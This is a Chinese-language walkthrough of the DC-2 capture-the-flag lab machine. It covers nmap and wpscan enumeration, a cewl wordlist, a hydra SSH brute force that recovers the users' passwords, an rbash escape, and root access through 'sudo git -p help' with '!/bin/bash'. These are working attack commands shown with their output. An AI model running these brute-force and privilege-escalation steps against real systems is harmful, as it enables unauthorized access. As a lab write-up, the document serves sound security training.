通过nmap扫描发现目标DC2的IP地址,运行着Apache和OpenSSH服务。使用wpscan识别出WordPress版本4.7.10,存在XML-RPC和外部WP-Cron等潜在风险。检测到三个用户:admin,jerry,tom。利用cewl生成密码字典,尝试暴力破解SSH,成功登录为tom用户。进一步通过sudo权限和git命令实现提权至root,并找到最终的flag。
靶机页面
信息收集
-
获取DC2的IP地址
通过查看到DC2的MAC地址为00:0C:29:DF:B1:F2,然后用nmap扫描我本机网段内存活d的主机,发现DC2的MAC地址对应的IP为192.168.175.149
-
靶机的web页面
-
扫描DC1开启的端口
┌──(kali💋kali)-[~] └─$ sudo nmap -Pn -A -p- -sS -sC -T4 192.168.175.149 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-01 11:49 EDT Nmap scan report for dc-2 (192.168.175.149) Host is up (0.0017s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-generator: WordPress 4.7.10 |_http-server-header: Apache/2.4.10 (Debian) |_http-title: DC-2 – Just another WordPress site 7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0) | ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA) | 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA) |_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519) MAC Address: 00:0C:29:DF:B1:F2 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 1.68 ms dc-2 (192.168.175.149) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.70 seconds
端口 状态 服务 版本 80 open http Apache httpd 2.4.10 ((Debian)) 7744 open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
-
web应用指纹信息
OS Linux 3.X Service Server: Apache/2.4.10 (Debian) X-Powered-By PHP CMS WordPress 4.7.10 -
wpscan扫描
┌──(kali💋kali)-[~] └─$ wpscan --url http://dc-2/ -e vp,u --plugins-detection mixed _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.18 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N]Y [i] Updating the Database ... [i] Update completed. [+] URL: http://dc-2/ [192.168.175.149] [+] Started: Sun Apr 2 04:24:42 2023 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.10 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://dc-2/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03). | Found By: Rss Generator (Passive Detection) | - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator> | - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator> [+] WordPress theme in use: twentyseventeen | Location: http://dc-2/wp-content/themes/twentyseventeen/ | Last Updated: 2023-03-29T00:00:00.000Z | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 3.2 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.2 (80% confidence) | Found By: Style (Passive Detection) | - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2' [+] Enumerating Vulnerable Plugins (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:00:05 <===============================================> (5370 / 5370) 100.00% Time: 00:00:05 [+] Checking Plugin Versions (via Passive and Aggressive Methods) [i] No plugins Found. [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <===================================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] jerry | Found By: Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Confirmed By: | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] tom | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Sun Apr 2 04:24:52 2023 [+] Requests Done: 5442 [+] Cached Requests: 6 [+] Data Sent: 1.349 MB [+] Data Received: 20.798 MB [+] Memory used: 253.66 MB [+] Elapsed time: 00:00:10
检测出存在三个用户分别为admin、jerry、tom
-
漏洞扫描报告
-
目录扫描
-
flag1
你通常的单词表可能不起作用,所以,也许你只需要保持冷静。 密码越多越好,但有时你无法全部获胜。 以一体身份登录以查看下一个标志。 如果找不到,请以其他身份登录。
根据提示,内涵着我们可能使用暴力破解的密码字典不起作用,还有提示了cewl,那我们试着爬取页面信息看看
cewl命令: cewl是一个ruby应用,爬行指定url的指定深度。也可以跟一个外部链接,结果会返回一个字典,这个字典可以传给其他工具进行密码暴力破解。
──(kali💋kali)-[~] └─$ cewl http://dc-2 >dc2.dir #把收集到的信息写进dir里 ┌──(kali💋kali)-[~] └─$ wc -l dc2.dir #显示收集到239条信息,可能是连接的密码 239 dc2.dir
-
hydra远程密码破解
hydra ssh://192.168.175.149:7744 -L user.dir -P dc2.dir -vV -f -t 64
发现可以使用tom用户去连接ssh 密码为parturient
-
wpscan枚举注册用户
wpscan --url http://dc-2 -U uesr.dir -P dc2.dir
这里检测出tom和jerry的密码
Username: jerry, Password: adipiscing Username: tom, Password: parturient
-
登录后台
这里试了用tom登录没有找到flag,用jerry登录找到flag
翻找页面,发现flag2
如果你不能利用WordPress并采取快捷方式,还有另一种方法。 希望你找到了另一个切入点。
-
ssh远程连接
用Jerry连接不上,用tom连接发现flag3
flag3:
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes. 可怜的老汤姆总是追着杰瑞跑。也许他应该为自己造成的所有压力道歉。
好像看flag3这也没发现什么了,先试试看看有没有SUID权限的命令
发现不行
回去接着仔细看flag3,提示了“su”,想到了可能暗示是sudo提权
先切换jerry用户试试,发现su命令和一些常用命令用不了,显示当前为 rbash,被限制的 Shell,所以可以考虑进行 rbash 绕过,麻烦鼠了,接下来卡住了不知道绕过,参考了这篇大佬的文章
有两种方法可以进行 rbash 绕过,这里选择使用
export命令:BASH_CMDS[a]=/bin/sh;a #注:把 /bin/sh 给a变量并调用 export PATH=$PATH:/bin/ #注:将 /bin 作为PATH环境变量导出 export PATH=$PATH:/usr/bin #注:将 /usr/bin 作为PATH环境变量导出
这时候一些常用命令就可用了,切换用户su jerry,切换成功,看一下目录发现flag4.txt
很高兴看到你已经走到了这一步,但你还没有回家。 你仍然需要得到最终的标志(唯一真正重要的标志!!)。 这里没有提示-你现在只能靠自己了。:-) 继续,滚出去!!!!
查看id和切换到root目录显示jerry普通用户权限
使用
sudo -l查看当前用户可以以 root 身份执行的命令,发现使用/usr/bin/git 切换到root权限是不需要密码
根据上面flag4显示,发现“git”,结合上面的flag3的提示的“su”,这里可能要使用到git提权
-
git提权
sudo git -p help #可以通过任何git命令(例如git branch)访问帮助系统 !/bin/bash
提权成功,root权限!!!!
查看最后的flag
扫一扫
1848
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
